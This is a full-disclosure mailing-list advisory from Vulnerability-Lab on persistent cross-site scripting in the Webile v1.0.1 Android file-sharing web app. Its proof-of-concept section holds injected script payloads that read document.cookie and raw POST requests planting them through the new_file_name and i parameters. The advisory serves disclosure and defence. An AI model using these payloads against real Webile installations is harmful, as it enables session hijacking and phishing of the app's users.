[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities
From:       "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date:       2023-07-19 7:13:37
Message-ID: 3334589c-5cdf-6e84-81e5-272d5a341fe4 () vulnerability-lab ! com
[Download RAW message or body]

This is an OpenPGP/MIME signed message (RFC 4880 and 3156)
--------------dPnBx2Cgcvb3Q5Wiv3dERNec
From: "info@vulnerability-lab.com" <info@vulnerability-lab.com>
Reply-To: info@vulnerability-lab.com
To: fulldisclosure@seclists.org
Message-ID: <3334589c-5cdf-6e84-81e5-272d5a341fe4@vulnerability-lab.com>
Subject: Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities
Content-Type: multipart/mixed; boundary="------------luikB4FxnxZTJMUVB2TwR0Vl"

[Attachment #2 (text/plain)]

Document Title:
===============
Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321


Release Date:
=============
2023-07-03


Vulnerability Laboratory ID (VL-ID):
====================================
2321


Common Vulnerability Scoring System:
====================================
5.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Webile, is a local area network cross-platform file management tool based on http protocol. \
Using the personal mobile phone as a server in the local area network, browsing mobile phone \
files, uploading files, downloading files, playing videos, browsing pictures, transmitting \
data, statistics files, displaying performance, etc. No need to connect to the Internet, you \
can browse files, send data, play videos and other functions through WiFi LAN or mobile phone \
hotspot, and no additional data traffic will be generated during data transmission. Support \
Mac, Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US \
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent web \
vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discoveredin the Webile \
v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject \
own malicious script codes with persistent attack vector to compromise browser to \
web-application requests from the application-side.

The persistent input validation web vulnerabilities are located in the send and add function. \
Remote attackers are able to inject own malicious script codes to the new_file_name and i \
parameter post method request to provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing \
attacks, persistent external redirects to malicious source and persistent manipulation of \
affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers \
without user account and with low user interaction. For security demonstration or to reproduce \
the persistent cross site web vulnerability follow the provided information and steps below to \
continue.


Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font \
color="blue">20:10:11</font><a href="javascript:;"   title="Copy" \
onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br> <span \
id="c_1658081411827">test2"<iimg src="evil.source" \
onload="alert(document.cookie)"></iimg></span><br><br></div> </div></div></div>
history logs messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: \
middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" \
align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div \
class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon \
layui-icon-ok"></i></div></th> <th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" \
width="15%">Date</th> <th style="text-align: center;vertical-align: \
middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead>
<tbody><tr>
<td style="text-align: center;vertical-align: \
middle!important;border-left-width:1px;min-height:180px;" align="center"> <input \
type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect \
layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div> </td>
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" \
onload="alert(document.cookie)"></iimg></span></td> <td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>



--- PoC Session Logs #1 (POST) ---  (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg \
                src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie:
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6



--- PoC Session Logs #2 (POST) ---  (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source \
                onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0


Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is \
estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] \
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.

Domains: 	https://www.vulnerability-lab.com  ;	https://www.vuln-lab.com  \
;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.

				    Copyright   2023 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE


["OpenPGP_0x1554D09B2933E2FE.asc" (application/pgp-keys)]
["OpenPGP_signature.asc" (OpenPGP_signature.asc)]
-----BEGIN PGP SIGNATURE-----

wsF5BAABCAAjFiEE0BctHpBdnIQSMWpxFVTQmykz4v4FAmS3jSEFAwAAAAAACgkQFVTQmykz4v7N
Dg//XituheGcYxHhvq9EmRx75ePBUqmTk0kU76s6HkU3oGAjpAlzOK3iXIfgX+a9eHl0CrEDnQgv
6yUQ2aeZnOOSw577o/Z/4kSdk+i8tQC6D6bAPtcmvwaQUFegodQ55bslcq2RWzbAJn5NwoXAy++u
AzJGgkcG3GieppTCHp3VE3cL82/B4jvwtLtDqnNP/gEFHnqpyUJNyeyz0sroDutBZKxBCE/AzRBh
t95jhWtnmp0bBnnlToAYJssZio++JT7U5Fb5aF7IQI+79+07dDSC+drihy3iko/F51kJlfqBStOQ
92G5xFxUY1RGotUr5u67hhfTL0all84a5oGhIyFnS0WVkL9786uy8KvCJFiNLsIP3QS3QL+bFdJW
y/jFQCCRdQJsD20fP7qjohCFThVOh92lrQjsk3siFZec3BK8S2TuFVz+TPrcqOzA4ByGthxfvSmM
OOmwljQflcDfgW1CISH/S+ZbXcnVzWydwviWVn0mOLEe60dnkODTgKnJTep/AV1t/n80izY8k4X3
AaPj1KVpWeu3wbe3+Yr95GvDYjgTeiXSwLiLBfZA6zBk1cL3XVYK7IESlK2CsI0cBGks6tWPyHBQ
BG809x+L2DjWHjFQxLfcM6Z5Ym6i4fdpYlqLtwPj4QU5W70VHGVbnRjlAhSWHUNWJtm2qbff/Sq7
4CQ=
=1qiZ
-----END PGP SIGNATURE-----

--------------dPnBx2Cgcvb3Q5Wiv3dERNec--


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============0610387680389717056==--

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic